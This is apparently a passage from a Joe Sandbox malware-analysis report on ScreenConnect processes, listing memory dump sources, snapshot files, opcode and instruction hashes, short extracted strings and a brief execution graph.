                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2e7c32c2771267dd34355da3d12c898e020900df959daa496b14330d8da56c49
                                                                                                                                                                                                                                                  • Instruction ID: c56ebb9dc3242fafe3447945a0dc23f48586695de7be682974cf6709b0e3736b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e7c32c2771267dd34355da3d12c898e020900df959daa496b14330d8da56c49
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF08C37B0C2046FD728CABEA501A9BBBEECBC4220B14C47FE54DC3780E931A5418768
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 16504461958617b74baf5093b392b504ade972e71dda6465ea101a7a0dfc345b
                                                                                                                                                                                                                                                  • Instruction ID: 0d6c61a561ac0c4368a0f007b901867991a03e4284983f135f4fe84e7dfa0449
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16504461958617b74baf5093b392b504ade972e71dda6465ea101a7a0dfc345b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46F059353003545FC757AFBDA814AAE3FE5DFC665030841BED895CB319DA21E80E9780
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133295385.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_121d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fa11011f3903fa1ace105ea41b5e6c910657024f419e4f18581330480576c21e
                                                                                                                                                                                                                                                  • Instruction ID: f4ea04a63e86c41d643800353df1b6ac4c69fbeba9cdfa4bba6e45127355b286
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa11011f3903fa1ace105ea41b5e6c910657024f419e4f18581330480576c21e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5F06271405344AEE7118A1AC8C8B63FFE8EB55764F18C55AEE484F28AC2799845CAB1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 24229033fa14bc9d6df5b37aebf2e4bd4f3b5177744a4ef86e04f6814d53e866
                                                                                                                                                                                                                                                  • Instruction ID: a4b383369f6e81a85f07fb269bb09968dccba7e98ee495805d6c82f8d1d2dda9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24229033fa14bc9d6df5b37aebf2e4bd4f3b5177744a4ef86e04f6814d53e866
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0F05C32B01481CFC741462CA8548557FF64F4A62872D82F1FC54CF282EB10DC5A8350
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2cc28fdcd85885c9c8f6625ff7f5d711bdb98a9a4e9a364a0ad651efb5415431
                                                                                                                                                                                                                                                  • Instruction ID: 371e4ac50f213465c8383b3f51cd06799a687e42c6cadcf07dfcda426fea9948
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cc28fdcd85885c9c8f6625ff7f5d711bdb98a9a4e9a364a0ad651efb5415431
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AF02B7044C7D58FC7029F38A858485BFF0AE0B22071586EEC4E5CB192D234984BD751
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ba65ca948e80543a623a6c634f00a23ea2dddece2fe7ddf2bffcc7832a00d736
                                                                                                                                                                                                                                                  • Instruction ID: 90abdbccd5be6f73323aa5c02db03167b846c229434803dc479f47b593bb4707
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba65ca948e80543a623a6c634f00a23ea2dddece2fe7ddf2bffcc7832a00d736
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AF0247240C7914FD312CB28E810798BFE1EEA222430946DAD4818F6AAD655FA49D351
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: eb1f7cef1c52e46799443045f0a39eb6dea3a98f2a09371eac3ca03ea3a8f854
                                                                                                                                                                                                                                                  • Instruction ID: 3f7aef50db740ff103dc384a2c38d94e4482905deceebde416ebe2883f8c6cde
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb1f7cef1c52e46799443045f0a39eb6dea3a98f2a09371eac3ca03ea3a8f854
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CF0A7352043449BC3615F79F41C42D7FB6EFCA23531486AAE542C7395CE705C55C750
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e877502803fe4c2375840c2d587d2ea5900e518eb6fff263242cd63ce48a3670
                                                                                                                                                                                                                                                  • Instruction ID: 3d89d01d1c4e600039fb4610c56f7548686f91adab8a010f36b2f7814355f0cf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e877502803fe4c2375840c2d587d2ea5900e518eb6fff263242cd63ce48a3670
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36E0D8311087924FC716DB2CF4402DCBFE1EF962207054AEDD1808B266CB60B9498394
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 65e4b696c279c52f1dcc7dd6a479f2be8ae2fe36df40ab47bbf066542f8032ab
                                                                                                                                                                                                                                                  • Instruction ID: 3270b51eafc31600112a793624ceb35f63e4316312086bc548e77407287a63e8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65e4b696c279c52f1dcc7dd6a479f2be8ae2fe36df40ab47bbf066542f8032ab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18E0263008D3C11FC3028B74A8966D57FE4CF47624F4908D9E5C58F143D126645BCBA3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 38b6f9126abd603b1b7089aab725e6144d7aee1b99e46b95133af580ccd25813
                                                                                                                                                                                                                                                  • Instruction ID: 40b23b33afd8441d977b71ead765ec14be3c68388bcf9bb659751b76a91ea6e9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38b6f9126abd603b1b7089aab725e6144d7aee1b99e46b95133af580ccd25813
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EE0EC744087459FC7519F24E584448BFF0BF0A614F0644DED8C8C7241E731A989DB52
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1fc9e2ab3997497ad834ed878b5c32322fa22e2dc5ea7d86da6400677be1306e
                                                                                                                                                                                                                                                  • Instruction ID: e14188b72c1f984577bab3ca615f72e2714a02098fa8eb448bcb90c2c0dc812d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fc9e2ab3997497ad834ed878b5c32322fa22e2dc5ea7d86da6400677be1306e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43D01730A1120CFF8B00EFA8E90059DBBF9EB44210B2042A8D408D7244EA31AF049B80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 002262bca67d2bedd4448879ebf168aaa814cefde7dc036ca588e711e2c2894d
                                                                                                                                                                                                                                                  • Instruction ID: 3b0905d6e3affc8cd507772b78f848520a5796f43525f4a501cafda22817a8ed
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 002262bca67d2bedd4448879ebf168aaa814cefde7dc036ca588e711e2c2894d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADD05B7094124CEFCB40DFB5E91155DB7F9EB54210B1085B9D808D3308DB315F449B80

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:8%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:2
                                                                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                                                                  execution_graph 28787 429feb0 CloseHandle 28788 429ff1a 28787->28788

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $kq$$kq
                                                                                                                                                                                                                                                  • API String ID: 0-3550614674

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (&kq$(oq
                                                                                                                                                                                                                                                  • API String ID: 0-2620321033

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: `Qkq$`Qkq
                                                                                                                                                                                                                                                  • API String ID: 0-2839243183
                                                                                                                                                                                                                                                  • Opcode ID: 8d8a92234f4782d6eab428b7898d1036d45c4bb8dde12b8f40406e7561e0a122
                                                                                                                                                                                                                                                  • Instruction ID: 2e105fd6dbb1fee165e9fd1bed0245c34c8a018e8b8836493d8a9fd745b5cd2b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d8a92234f4782d6eab428b7898d1036d45c4bb8dde12b8f40406e7561e0a122
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E841CD31A003199FDB64DF68D804BAEBBB5FB45300F4081E9D509A7294DB745D49CF92

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $kq$$kq
                                                                                                                                                                                                                                                  • API String ID: 0-3550614674
                                                                                                                                                                                                                                                  • Opcode ID: 822d3a454451adbc36a821ffa39bc6362745286aec996108d016322253d37e5b
                                                                                                                                                                                                                                                  • Instruction ID: 2c1c48466b271fed7660d830c9c6d39f70186360385a2ed35b2afedb4b028a81
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 822d3a454451adbc36a821ffa39bc6362745286aec996108d016322253d37e5b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7DD05E303902188F967CDE29E540A1233E9BB856013A205E9D6098B37ECB35EC41C751

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                                                                                                                  • Opcode ID: 277025bbd67b4295e0d822957d1ee75f0434c1c27bed87224e216c440465a8ba
                                                                                                                                                                                                                                                  • Instruction ID: 72222df1fdfeeeaff439c92f6ed978da0c86a7b2cd617f034b6fed7e0de88f10
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 277025bbd67b4295e0d822957d1ee75f0434c1c27bed87224e216c440465a8ba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2D18375A40705CFCB49DF68C884A99BBB6FF49310B518699E909AB365DB30FC85CF80

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (oq
                                                                                                                                                                                                                                                  • API String ID: 0-3175707579
                                                                                                                                                                                                                                                  • Opcode ID: 1dcde31ce2208eeea5ab03d9964557673b2dd8c2282537e5d7ea9e09466759a6
                                                                                                                                                                                                                                                  • Instruction ID: 4c363157f0a2ac3447762167e320660bf047ef2257f8f8fb7ffcaea40621f68b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1dcde31ce2208eeea5ab03d9964557673b2dd8c2282537e5d7ea9e09466759a6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E361F734B106058FDB14DF69E99495EB7F2FF8D315B5281A8E506AB369DB30EC01DB80
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: LRkq
                                                                                                                                                                                                                                                  • API String ID: 0-1052062081
                                                                                                                                                                                                                                                  • Opcode ID: d79ddfbf9d7ca2214be8818c514dce042ab0782fadb577a8455d804b5391a608
                                                                                                                                                                                                                                                  • Instruction ID: 6fdd6bc18b2f1abc58e2d42591c6ad810c932c4dc4e06c0d43e972709fa1f91a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d79ddfbf9d7ca2214be8818c514dce042ab0782fadb577a8455d804b5391a608
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5451E230A022919FDB299B78D95476FBBE2FF84301F15C5AED446DB299DB30AC85C780
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $kq
                                                                                                                                                                                                                                                  • API String ID: 0-3037731980
                                                                                                                                                                                                                                                  • Opcode ID: fdf6077a7493d73c3360539a6ba886c806bbde5dce1b9d0a1a3a8553e879bc73
                                                                                                                                                                                                                                                  • Instruction ID: f2193f931c19f5b80dcd44a23cd4345f27466e3c11c6c53697456dd554823d27
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdf6077a7493d73c3360539a6ba886c806bbde5dce1b9d0a1a3a8553e879bc73
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B518230A50319CFDB19EFA8C55866DBBB2FF45300F1186A9D406AB369DB74DC85CB80
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (oq
                                                                                                                                                                                                                                                  • API String ID: 0-3175707579
                                                                                                                                                                                                                                                  • Opcode ID: 315a42b5f84813863ca5ee8b9cb2d83deb6a1fad0015d89c10326b55f58e54bb
                                                                                                                                                                                                                                                  • Instruction ID: 8ac14c9ac78302a1d391254491482ce3d89a0aa9daa3bdc1453ba9d7812e4914
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 315a42b5f84813863ca5ee8b9cb2d83deb6a1fad0015d89c10326b55f58e54bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F741C231B00505CFDB29EF68D894A6EBBB6EF84300F15C5A9E9059B359DF34E806CB90
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                                                  • API String ID: 0-1334834377
                                                                                                                                                                                                                                                  • Opcode ID: 9c7319dd5346230da4d30c7f8b5271fbe537a35f10cf2d2260b802cd21433376
                                                                                                                                                                                                                                                  • Instruction ID: 736a105dc06b4cb18f6ff75514c313b1e9e8e66fc6237da064a4f75bf86a629f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c7319dd5346230da4d30c7f8b5271fbe537a35f10cf2d2260b802cd21433376
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5319031B502115F9709EB7DA84455FB7E6EBC82103518A68D916EB348EF70ED05CBE4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                                                  • API String ID: 0-1334834377
                                                                                                                                                                                                                                                  • Opcode ID: e35c64e1be66612e406871142daebf4435cfc092b8ad69d39908e109a503905e
                                                                                                                                                                                                                                                  • Instruction ID: 43b32bf1c7f80560607de85c41e4bd905439d6a9426c33c2e9745083ad632d15
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e35c64e1be66612e406871142daebf4435cfc092b8ad69d39908e109a503905e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E31A231B502115F8709EB7DA84455FB7E6FBC82103518A68D916EB348EF70ED05CBE4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: LRkq
                                                                                                                                                                                                                                                  • API String ID: 0-1052062081
                                                                                                                                                                                                                                                  • Opcode ID: df3c958411d0961296204f61804c53445f75225a8874d581392958a887e0d566
                                                                                                                                                                                                                                                  • Instruction ID: 4a951c906dd1bc748fe49b0f06cd4dfe70caec2b0893d76070d9942b5a710b98
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df3c958411d0961296204f61804c53445f75225a8874d581392958a887e0d566
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C721E231B002059FD7299FA4CC59BAFBAB6BBC8310F18846DE502A72D4EE719C00CB61
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2948084594.0000000004290000.00000040.00000800.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4290000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                                  • Opcode ID: 202df0619f6622e37de5eb8f3b503d03eaab34ff6d70465859c9b62593e50df1
                                                                                                                                                                                                                                                  • Instruction ID: d5af013048a5bb5116047859a157877cb860ce7f1baca3cf500b5763af1af497
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 202df0619f6622e37de5eb8f3b503d03eaab34ff6d70465859c9b62593e50df1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 611122B18002498FCB20DF9AC585BDEBBF4EB48324F248459D568A7350D379A945CFA5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $kq
                                                                                                                                                                                                                                                  • API String ID: 0-3037731980
                                                                                                                                                                                                                                                  • Opcode ID: ff1ca00d3dfbbbd1bfd6d82280528789ee6fd6a051ea6f04890663c0720c1f6a
                                                                                                                                                                                                                                                  • Instruction ID: 021f2d1d294eee51f0ac71349e1b7e926e26a1ccbe4df28d3b1530dd05d84e4b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff1ca00d3dfbbbd1bfd6d82280528789ee6fd6a051ea6f04890663c0720c1f6a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFE08C706882508FD73ACF68E8816413BB4FF4620235701D6D908CB27BD331D806C702
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
